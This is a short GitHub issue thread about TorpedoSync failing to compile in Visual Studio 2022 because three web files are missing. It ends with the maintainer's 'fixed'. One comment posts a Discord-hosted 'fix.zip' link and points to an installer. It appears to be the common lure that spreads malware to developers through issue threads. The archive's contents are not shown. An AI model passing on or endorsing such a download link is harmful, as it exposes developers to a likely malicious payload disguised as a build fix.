### ISSUE TITLE
compiler error : \Web\bundle.css , \Web\bundle.js and \Web\global.css

### ISSUE THREAD

**Issue by ozz-project** [mgholam/TorpedoSync#22]
I have tried to compile the current master with the VS22 community. There is an error and the following files were not found.
```
\Web\bundle.css 
\Web\bundle.js 
\Web\global.css
```

I had a quick look at the code, it looks like they have been renamed

```
\Web\bundle.css -> \Web\index.css
\Web\bundle.js -> \Web\index.js
\Web\global.css ->?
```

**Comment by maher-nakesh** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by mgholam** [comment]
fixed
